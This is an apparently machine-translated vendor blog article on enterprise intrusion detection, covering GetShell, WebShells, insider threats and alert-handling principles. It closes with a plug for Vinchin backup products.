How do you know if your enterprise has been invaded? Is it not invaded, or is it not discovered temporarily due to insufficient perception? In fact, intrusion detection is a serious challenge that every large Internet enterprise must face. The higher the value of a company, the greater the threat of invasion. Even the originator of the Internet, Yahoo, was still confronted with the theft of a full amount of data when it ended (was acquired). Security is no small matter. Once the Internet company is successfully “invaded”, the consequences will be unimaginable.
Definition of intrusion
We can give a definition of intrusion: hackers control and use our resources (including but not limited to reading and writing data, executing commands, controlling resources, etc.) to achieve various purposes without authorization. In a broad sense, hackers use SQL injection vulnerabilities to steal data, or obtain the account password of the target domain name in the ISP, to tamper with the DNS pointing to a black page, or find the target social account, and conduct unauthorized control over virtual assets on microblog/QQ/mailbox, all belong to the scope of intrusion.
Intrusion detection for enterprises
The scope of enterprise intrusion detection is narrow in most cases: generally, it refers to the behavior of hackers controlling PCs, systems, servers and networks (including office networks and production networks).
The most common way for hackers to control PC, server and other host assets is to execute instructions through the shell. The action to obtain the shell is called GetShell.
For example, get the WebShell through the upload vulnerability of the Web service, or directly execute the command/code using the RCE vulnerability (the RCE environment provides a shell in disguise). In addition, it is also typical to implant the “Trojan Back Door” in some way and then directly use the SHELL function of Trojan integration to remotely control the target.
Therefore, intrusion detection can focus on the action of GetShell and the malicious behavior after the success of GetShell (in order to expand the battle results, most hackers will use Shell to detect, search for and steal, and horizontally move to attack other internal targets, which can also be important features different from the characteristics of good people).
When we are used to “attack” as a normal state, we will solve problems in such a normal state. What reinforcement strategies can be used and what can be used to achieve normal operation. If there are any strategies that cannot be normalized, for example, many people need to work overtime to temporarily attack and guard, then most of the strategies will gradually disappear in the near future. There is no essential difference between our strategy and our strategy.
“Invasion” and “Insider”
One scene close to the invasion is “insider”. Intrusion itself is a means, GetShell is just the starting point, and the goal of hackers GetShell is to control resources and steal data later. While “insiders” naturally have legal authority and can legally access sensitive assets, they illegally dispose of these resources for purposes other than work, including copying copies, transferring leaks, tampering with data for profit, etc.
The behavior of the insider is not in the scope of “intrusion detection”. It is generally managed and audited from the perspective of internal risk control, such as separation of duties, double audit, etc. There are also data anti disclosure products (DLP) to assist it, which will not be discussed in detail here.
Sometimes, when a hacker knows that employee A has access to the target asset, he attacks A in a targeted way and then steals the data with A’s permission, which is also characterized as “intrusion”. After all, A is not a malicious “insider”. If the data stolen by hacker A cannot be captured at the moment of hacker attack, or the data stolen by hacker A cannot be distinguished from the data accessed by normal employee A, then the intrusion detection also fails.
Common invasion methods and countermeasures
If you do not understand the common intrusion methods of hackers, it is difficult to have a target, and sometimes you may fall into the trap of “political correctness”. For example, the penetration test team said that we did Action A, but you didn’t find it, so you can’t. However, the actual situation is that this scenario may not be a complete intrusion chain, and even if this action is not found, it may have no impact on the intrusion detection effect. Professional experience is needed to support and make decisions on the harm caused to the company by each attack vector, how to rank the probability of occurrence, and how to solve the cost and benefit of each attack vector.
Basic principles of intrusion detection
A model that does not follow every alarm thoroughly is equivalent to an invalid model. After the intrusion, there are actually warnings before the defense, but too many have not followed/investigated thoroughly. This is “an afterthought”, which means that they do not have the ability to discover. Therefore, security operators often feel helpless for products that warn thousands of people every day.
We must shield some similar alarms that occur repeatedly to focus on closing each alarm. This will result in a white list, that is, false negatives. Therefore, false negatives of the model are inevitable.
As any model will be under reported, we must make multiple models in multiple latitudes to form associations and depth. Suppose that the static text analysis of WebShell is bypassed by hackers’ deformation, and malicious calls in the RASP (runtime environment) can also be monitored. In this way, you can choose to accept the missing reports of a single model, but you still have the ability to find them on the whole. To ensure your enterprise data security, you should backup your data regularly. Vinchin offers solutions such as VMware backup for the world’s most popular virtual environments, XenServer backup, XCP-ng backup, Hyper-V backup, RHV/oVirt backup, Oracle backup, etc.